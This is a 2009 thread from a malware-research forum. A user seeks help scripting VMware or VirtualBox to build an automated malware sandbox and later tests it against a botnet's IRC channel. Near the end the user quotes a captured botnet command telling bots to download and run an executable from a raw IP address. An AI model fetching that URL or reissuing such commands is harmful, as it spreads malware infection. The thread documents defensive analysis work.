Malware Domain List
Malware Related => Tools of the trade / Internet News => Topic started by: log0 on August 09, 2009, 12:02:56 pm
-
Hi all gurus,
Could use some help and directions.
I have Windows in VMware that I want to control from my VM Host to start/stop/revert/run programs. I am aiming to build an automated, simplified but specialized malware sandbox to extract pcap files (yadayada... anubis is too slow). However, the Pyvix doesn't seem to be updated for 3 years already, and it isn't just the compilation issue ( it seems ) but mismatching binaries, and so.
My questions :
1. If I want to script VMware workstation in Python, what are the solutions out there?
2. What are the usual solutions as used by you experts in industries and focused academics?
Thank you.
Log0
-
You have to install VMWARE VIX API first.
http://www.vmware.com/support/developer/vix-api/
This api provides bindings for for C, Perl, and COM (Visual Basic, VBscript, C#).
VMWARE doesn't provide bindings for python,but there are python bindings.
Look here:
http://groups.google.com/group/vmkernelnewbies/browse_thread/thread/b910fe85b1eebcb2
I haven't used the python bindings, so I don't know how well it works.
-
Hi SysAdMini,
Yes I have installed the ViX. =)
Here is the extract I obtained from pyvix, it looks oooooooooooooooold !!!!!!
pyvix-2006.07.18-source.zip 32.2 KiB Tue Jul 18 2006 14:44 939
So, I'm just curious if it's a "declared dead" library?
===
BTW, so most people still use the C interface of ViX ( perhaps Perl? ) to automate only?
-
Aha, that new updated code works better... got some new errors, but there goes the progress. Thanks SysAdMini. =)
-
Didn't really mean to bug... anyone got this error?
I found this is a pretty common unanswered problem ... not any solutions I got ...
VIX_E_WRAPPER_SERVICEPROVIDER_NOT_FOUND = 22003
pyvix.vix.VIXException: The system returned an error. Communication with the virtual machine may have been interrupted
I used the powerOn.c helloworld code provided by Vmware. Anyway..it fails at connect.
I'll continue to work on and see what's going to come back... but if anyone have met this, please kindly offer advice.
I really need to post an article on this common problem after I've solved it. =)
Thank you very much.
-
Yayayaya, I abandoned vmware and picked up (free) virtualbox. Somehow the installation of ViX didn't work quite well, but why bother fix when there's easier way. Waste no time.
There goes vboxmanage , which does it in a simpler way.
for those interested, I'm building a automated tool for infiltrating botnets... let's see what comes out.
Thanks.
-
Look forward to seeing the results :) (looking into setting up automated analysis myself too)
-
I have tested virtualbox a few months ago. I was unable to setup a network bridge to my wireless lan adapter.
I'm wondering if it works in the current virtualbox version. If yes, then I would give it a second chance.
-
>>SysAdMini
oops... a lil busy and then workin' then.
Didn't try bridge wireless before, top two from google :
http://ubuntuforums.org/showthread.php?t=724783h
http://forums.virtualbox.org/viewtopic.php?t=1787
Any luck?
I basically have a tool that can grep traffic for myself, now need to piece up a bot and everything altogether.
===
>> MysteryFCM
Sure, it is just a few piece of spread out technology pieced together... I guess a lot of ppl in MDL alrdy got them?
-
I guess most of these are basic tools to most ppl...everyone gotta build their own guns!
The malware caught - 6/41 ( 14.63 % ) ouch.
Basic
2009-08-23 18:27:20,644 - log-6 - INFO - Received : [:irc.efnet.com 332 [ #xx6 :.flushdns |.down -S |.update -S |.update http://94.76.194.116/xx8.exe x5s5g6q3x1n3.exe x5s5g6q3x1n3]
...
but sadly, still doing it wrong. =)
2009-08-23 18:27:23,560 - log-6 - INFO - Received : [ERROR :Closing Link: [[<my ip>] (Client hat die Verbindung getrennt)]
German stuffs.
Workin' workin' ...